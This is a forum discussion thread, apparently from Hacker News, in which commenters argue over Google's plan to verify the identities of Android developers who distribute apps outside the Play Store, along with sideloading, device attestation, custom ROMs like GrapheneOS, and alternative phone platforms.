Because only 5% of American adults are highly literate with technology, 30% of working adults self-identify as "never (ever!)" using folders and files for organization, and most people have better things to do with their time to be taught to perfectly analyze the safety of an App Store. Don't hope in the next generation either - only 38% of Gen Z could successfully complete tasks more difficult than moving an email between folders, while an IEA study found that only 2% of Gen Z had reached the anticipated "digital native" stereotype level of fluency.
I would argue that Gen Z is worse at computers than Millennials specifically because we put too many guardrails in place to make computing easy for the illiterate. Now we are all paying the price, as user agency is continually eroded away to further protect the dumb from their own unwillingness to gain a basic understanding of the very tools critical to their daily life.
I don't really understand. These people would never download F-droid in the first place or go into settings to enable dev mode.
And besides if you really want to combat fraud stop using creditcards for fuck sake and make a modern payment system that doesn't rely on 1970s technology.
They're not, and Windows got decades of hate for it. Google probably wants no part in that, especially since Apple mostly avoids viruses and malware through their app store
This is just an excuse. Google doesn't care about these people, they already proved that by showing scammy advertisements, as long as they get their profits, they don't care. Don't fall for this "it's for your security" argument.
> Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store
This is absolutely unacceptable. That's like you having to submit your personal details to Microsoft in order to just run a program on Windows. Absolutely nuts and it will not go as they think it will.
Ultimately it’s them that has market power.
To meaningfully challenge it, developers need to agree to withheld supply like a cartel (illegal?) or union.
I think it’s probably close to the union scenario in an industry with a single employer, as there is that one too many relation (developers vs employer). Whereas a cartel is a few suppliers conspiring against all consumers.
I’m not sure developers would go to those lengths, and I’m not sure it would work either as the benefit is too high from defecting from such a coalition.
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all. They understand that as well.
They tried to pull a similar move with WinRT/UWP, but nobody wanted it, so now you can continue with Win32.
They would love to do so, but legacy compatibility is a major business advantage.
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
Microsoft basically already has this (and has for the last ~20 years) as SmartScreen.
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
I suspect it's not grandma getting scammed by APKs, but people installing cracked versions of spotify/youtube/paid games.
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
I just want to say:
I am so sick of Google.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
Sincerely.
> I hope the DOJ/FTC split Google into a dozen companies.
There's no chance of that under the current regime. It loves bribery and Google has the money to get whatever they want.
control=surveillance
This whole thing is getting totally out of surveillance!
Someone should hit surveillance-alt-delete!
control is the entire point of the surveillance
I never really got into "phone" progrmaming, always waiting for the shenanigans to die down. But somehow the shanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
Money is a powerful motivator. For better or worse.
Software distribution control didn't start with phones, it started with game consoles.
i made and released some apps in the early days. Got tired of it and got tired of the reminders from google to add banners, screenshots, submitting icons to support multiple resolutions.. notifications that apps i haven't touched in decade are no longer compatible etc.
so much extra work involved that isn't building the app.
I worry how this will affect fdroid etc.
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a google-appproved one, and alternatives still are decades behind in terms of app ecosystem.
I think they might just get away with it.
Don’t worry though, the TPM requirements in everything are for your protection.
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
If you don't mind sharing, which country is that?
It takes less time to search and find that Anatel is the Brazilian telecom agency than it does to type that comment.
They do marvellous things like mandate weird Brazilian Android games on the phone I bought in Brazil.
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
Image asking someone where they’re from only to be told a US state, and only the state.
> Image asking someone where they’re from only to be told a US state, and only the state.
Atlanta or Tbilisi?
Apart from Georgia, I don't see how this could be a problem
When I google ANATEL, it comes up as Brazil
Unless they give F-Droid access, the antitrust prosecution will double.
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases has already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
Maybe they gave a political donation?
I don't think Google can be blamed for this - their own phones are one of the last which can still be unlocked.
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
true, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. unfortunately, with the 10 series pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
https://learn.microsoft.com/en-us/windows/apps/develop/smart...
Code signing by pseudonymous key is different that requirement to cede personal data to central registry
Code signing is somewhat OK as I can get code signing cert using provider in my country that I can go to physically and show their employee my ID.
If google does that then it’s not the worst.
Worst is having to get my ID and all details scanned and processed by Google.
They did it the right way for a very long time and yet people keep buying iPhones, I think I would do the same if I were them, users clearly don't seem to care about openness and freedom to use their devices however they want. I mean, people care about the color of archaic text messages. There is nothing to save.
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
Is the right-click -> Open workaround not a thing any more on macOS?
Open -> Click away the error message -> Settings -> Privacy & Security -> Open Anyways -> Open Anyways -> Authenticate -> app actually opens
There's a ctrl+open shortcut, if I remember correctly, which may be what the parent comment is referring to.
Nope, they've been making it steadily more difficult with each release. The control open shortcut no longer works.
As of macOS 15 (I think?), that shortcut stopped working, it will just show the same unverified software warning.
wont it just open the door for alternatives? linux on pc and ??? on mobile?
Ah, then it would be acceptable if an independent third party who does not share data with Google other than Boolean yes/no was used to do this. I expect that’s their long-term plan anyways, to defuse the predictable backlash and externalize the problem and liabilities altogether, once the initial ID harvesting is done.
I think google has incentive to get that data for themselves so they won’t give that up.
One of those would be in corrupt countries you don’t have the „trusted 3rd party”
This is what Apple already does, isn't it? Why wouldn't it work for Google too?
Apple requires you to get a developer account with them.
Nowhere does that require you to go and get a DUNS number, which is onerous for a single developer to do without the infrastructure of a company.
Never heard of DUNS. It seems to be a US company *Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangledesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
That would be a reasonable argument if it weren't the world's biggest malware vendor doing this.
I've had a business get listed on DUNS; once you're on it, they resell your data forever.
It’s not just Apple, lots of federal programs in US require a DUNS number.
Yeah, basically this is the rise of computer-credit agencies.
Youc an see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both it's appearance on the app store and any developer who'd program similar.
While the linked article notes that organizations require a DUNS number seemingly as an aside, personal accounts do not.
Which is exactly the same policy as Apple.
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
> For me the difference is that Android is an open-source operating system
Google Play is not open source. You're still free to sideload on phone that use vanilla open-source android like the Fairphone.
Someone create a website to emulate apk!
The problem here is that the EU, which would normally be the only hope to put a stop to bullshit like this, seems to like this.
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
https://www.bbc.com/news/magazine-26328105
https://en.wikipedia.org/wiki/Parents_Music_Resource_Center
https://en.wikipedia.org/wiki/Seduction_of_the_Innocent
https://www.nytimes.com/1997/02/27/business/job-insecurity-o...
Yanking the leash of the proletariat
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
Why should I be forced to trust Google or Apple.
You are not.
It's certainly convenient in this modern world to pay for and use one of their devices though.
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
I’m willing to sacrifice your rights if it means that there’s less incentive to steal my phone
[dead]
Id argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
In what way? Seriously, what benefit is there? (And don't say security...)
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
They're happy in their walled garden, until they don't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
> For the average user, device integrity is more valuable (by a lot) than side loading.
Right until their devices start to act against their will.
The device integrity is are talking about it integral only to Google and Apple. Not to you.
Average users also benefit from restricting their ability to purchase alcohol or tobacco, but I don’t see anyone suggesting that…
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
Then they should go buy a boomerphone that can make calls and text and nothing else and stop screwing things up for the rest of us.
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
You do realize windows already does this right?
Can you explain in what way Windows already does this?
Why would it not go as they think it will? The big guy always wins against the little guy. The fact they make this move suggest they know it is a sure bet.
So long as they don't make it very hard to get an ID approval, I don't see why people shouldn't know who developed an app.
Currently the entire ecosystem is riddled with malware, spyware, or adware with shady source information and people have no way to verify the data practices
This is the worst thing to happen to technology in recent times since there is only two major phone OS's.
It isn't possible to ban encryption, so the governments have to chip away at security and privacy using these techniques.
From: https://developer.android.com/developer-verification
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
> This won't end well for Google or the governments involved when the people get so angry
The amount of people this makes angry is so minuscule that it probably wouldn’t even pass one of those theatrical “sign this petition to get the government to discuss it” thingy. Mind you, the only reason the whole side-loading court cases were going forward is because a giganormous company (Epic) wanted to make more money instead of paying the Google/Apple tax. Not because some people were angry.
Yeah. "People" don't care.
> This is the worst thing to happen to technology in recent times since there is only two major phone OS's.
I don't think that's it. The desktop OS situation has historically be similar with 2 major large players and a bunch of insignificant ones.
This comes down to user expectation.
No, it's not similar.
There are two OS platforms for desktop/laptop usage: MacOS Windows
These both contain ways to run arbitrary compiled code from an arbitrary source -- like a computer should. Losing this feature of our smartphones should have everyone concerned.
Right. The OP's point was that just having 2 major OSes is the problem but it's clearly not because we had that situation with desktops/laptops and they both allow arbitrary code.
What's wrong with loading an alternate OS that isn't Play Protect certified?
Attestation & Play Integrity is having a good go at blocking this: lots of critical software (e.g. the app required to use your bank account) requires certified attested devices, and Google are pushing hard to get as many apps as possible to activate that for "security", making non-Google Android un fixably 2nd tier in functionality.
Doesn't GNU/Linux also have this problem with e.g. Netflix? If you don't pass their spyware, you get shitty streams from video apps and no access to financial accounts.
[dead]
Most vendors, including the big ones, don't play well with that. Google just revoked open sourcing the Pixel as the reference design which was the strongest option for that. Things like newer Samsungs are black boxes and everyone is actively making it harder to do anything with devices you bought and paid for.
Soon you won't be able to do this either because most manufacturers are locking down the bootloader.
And Google stopped providing device trees and driver binaries... and stopped releasing AOSP as often, and, and...
The number of people able to do that is fewer than those willing to send in copies of overnment IDs. Phones compatible with AOSP builds are rare outside small bubbles of Pixel users as well.
> the people get so angry that they are forced to roll this back.
This is political fantasy. There is no mechanism for "the people" to force anyone to roll this back. They can vote for the candidate owned by google, or the candidate owned by google. If they want to find another candidate, they'll have to use google to find one.
If enough people internal at Google get pissed off and raise this up enough it can legitimately get rolled back.
They will just get sacked for sycophants either here or abroad. For every principled worker there is, there is another person willing to eschew those principles for that paycheck. This is a desperate world by design to enable these tradeoffs by the very people who build, maintain, deploy, and ultimately control the worlds systems.
A better world is possible. Rise up, workers! You have nothing to lose but your chains!
and your salary
If the workers rise up properly, they can reposses oligarch riches instead!
History has seemed to show the only likely outcome is the violent redistribution of riches from one set of oligarchs to another.
I mean, you're pretty optimistic that the current fascism is going away any time soon.
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
It really isn't that bad. I've never owned a smartphone, and can do everything I need through websites and the occasional phone call.
>live like an outcast that can't access essential services?
I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.
If a service can be accessed only with a smartphone, I complain (which is of little use).
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
> live like an outcast
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
Again, and again, and again.
I've been doing it. That's why I'm vegan.
I'm sorry, this is such a funny follow up comment, I literally lol-ed when I got to it.
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while i appreciate going after factory farms, you're only enabled to do so by large corporations.
What if people stopped buying brand new Android phones and instead bought used ones and then installed alternative Android versions and app stores.
Can't access banks, ticket systems etc. unfortunately we are in the era of tightened screws, the freedom is running out :(
Lol all these things work via the web. You just log on via the browswer. Not everything needs an app.
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents - Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know) - All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet). - Your phone is stolen: you lost all the ways to contact people, but you can buy another one - Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
> physical maps
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
Aren't there attestation frameworks under development that they could start using too?
Other than banks & ticketing, there is a whole host of things that do in fact need an app.
* Mobile payments
* Navigation
* All manner of IoT devices
* Wearables!
* Digital versions of ID (Mobile Passport Control)
etc.
So no, you can't just use the web.
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
you can usually just use the web-interfaces for those services. less convenient, sure, but the options are there.
Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protect your privacy even less than iOS does.
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks ala Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
You can side load three apps at a time outside the EU and unlimited inside the EU.
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
A locked-down Android is pointless.
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
And most of the world is like that.
I'm curious what you think the alternative is, because Apple is definitely a lot worse, and we all know they're very much a duopoly.
BTW, all the GrapheneOS, etc. are still Android phones.
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
Looks like they can avoid these restrictions:
https://grapheneos.social/@GrapheneOS/115090818389369737
> "GrapheneOS doesn't include Google Mobile Services and the requirements for certification aren't relevant to us."
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced Safetynet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
[0] https://www.nytimes.com/2003/06/30/business/technology-a-saf...
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
It’s use-it-or-lose-it.
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
GrapheneOS uses a sandboxed version of Google Play Services, not the GMS certified devices they mentioned in the article.
I had a Jolla phone on my hands the other day and I must admit this…
SailfishOS is pretty nice
I might get one next
It's really nice when you first use it but if you have to use it as a daily driver it's pure pain. Rather go for graphene.
Buy Xperia 10 III while you still can. It's the best SailfishOS phone at the moment.
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
https://furilabs.com/shop/flx1/
https://www.bunniestudios.com/blog/2020/introducing-precurso... This is the most secure phone that has been made recently.
Precursor is neat, but it isn't a phone.
Neat concept.
For anyone else failing to resolve DNS for that domain: https://archive.is/q7w0x
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
Even with this change, Android is still more free than iOS by far.
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
Vollo from German is one https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Fairphone from the Netherlands is another https://www.fairphone.com/
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
For once Fairphone never updating their phones will work in our favor! If Google roll sthis out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
> Fairphone never updating their phones
I have a Fairphone and i get updates pretty frequently so not sure what you mean?
The Linux Experiment podcast has a nice review of the Vollo phone https://www.youtube.com/watch?v=Dh-rIxrGXFU
GrapheneOS + F-Droid is a joy to use, for me. I'm kinda shocked when I use anyone else's phone, now.
If they start selling their own devices, I will buy one and (assuming it turns out how I hope it will) recommend it strongly.
Side note, I read that GrapheneOS project is having some challenges recently.. between [0]the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) - and [1]one of Graphene's two core contributors being detained/conscripted into a war.
[0] https://grapheneos.social/@GrapheneOS/114665558894105287
[1] https://grapheneos.social/@GrapheneOS/114359660453627718
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
My banking app works fine on GrapheneOS. There is a crowd-sourced list here with current status for many of them: https://privsec.dev/posts/android/banking-applications-compa...
Most banking app work, either directly or with a settings change to allow Google Play Service emulation. [1]
[1] https://grapheneos.org/usage#banking-apps
Second phone for all official business apps, banking, etc. Never leaves home and it's used only for this purpose
A web browser in the worst case scenario. The same way you'd do it on a computer.
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my banks app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
As a GrapheneOS user, the way I access my banking app is by downloading it from the Google Play store just like everyone else.
They don't all work, though: too many crank up the settings on google's various 'integrity' checks and will fail on anything that isn't 100% google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure')
What's wrong with their web apps? The only real shortcoming I can think of is depositing checks digitally but I haven't had to do that in years.
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely. Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
Windows 10 Mobile was good.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
The developer experience was trash.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
